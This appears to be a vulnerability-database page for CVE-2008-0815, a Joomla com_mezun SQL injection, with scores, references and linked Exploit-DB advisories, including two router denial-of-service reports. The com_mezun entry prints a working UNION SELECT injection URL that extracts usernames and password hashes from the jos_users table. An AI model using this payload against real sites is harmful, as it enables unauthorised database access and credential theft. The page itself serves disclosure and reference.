CVE-2008-0815
Published 2008-02-19
Priority P3 · 42 · high · CVSS 2.0: 7.5
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 0.96% (57.1th percentile)
SQL injection vulnerability in the com_mezun component for Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter in an edit task.
No detection rules found.
Exploit-DB
Gigaset SE461 WiMAX Router - Remote Denial of Service
exploitdb·2009-03-23
CVE-2009-1152 Gigaset SE461 WiMAX Router - Remote Denial of Service
---
Helith - 0815
Author : Benkei
Date : 2008-02-08
Vendor : Siemens
Affected product : Gigaset SE461 WiMAX router
Firmware version : 1.5-BL024.9.6401
Probably other firmware versions are affected as well
Type : Denial of Service
OSVDB :
Milw0rm :
CVE :
ISS X-Force: :
After establishing a tcp connection to the affected device on port 53 from the
LAN interface and after closing the connection the router will restart.
Sometimes when using the web trigger with Internet explorer the WAN
configuration (ip, gateway ip, dns servers) for the device was lost and a
hardware reset was
Exploit-DB
Netgear SSL312 Router - Denial of Service
exploitdb·2009-02-09
CVE-2009-0680 Netgear SSL312 Router - Denial of Service
---
Helith - 0815
Author : Rembrandt
Date : 2008-02-27
Affected Software: proprietary CGI
Affected OS : Netgear embedded Linux for the SSL312 router
Probably other devices are affected as well
Type : Denial of Service
OSVDB :
Milw0rm : 8008
CVE :
ISS X-Force: :
BID : 33675
Trying to fix it responsibly and get in contact with the vendor:
-- ZDI --
Case Opened 2008-12-28 07:57 GMT-6
Case Closed 2009-01-15 17:01 GMT-6
"After some deliberation we have unfortunately decided that we won't be
accepting bugs affecting NetGear products."
-- END --
Contacting Netgear and mitre.org: 2009-02-01 1
Exploit-DB
okul siteleri 'com_mezun' Component - SQL Injection
exploitdb·2008-02-12
CVE-2008-0815 okul siteleri 'com_mezun' Component - SQL Injection
---
source: https://www.securityfocus.com/bid/27755/info
'okul siteleri' is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://ww.example.com/index.php?option=com_mezun&task=edit&hidemainmenu=S@BUN&id=-9999999/**/union/**/select/**/concat(username,0x3a,password),username,password,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a/**/from/**/jos_users/*
No writeups or analysis indexed.
References:
http://securityreason.com/securityalert/3663
http://www.securityfocus.com/archive/1/487992/100/100/threaded
http://www.securityfocus.com/bid/27755
https://exchange.xforce.ibmcloud.com/vulnerabilities/40448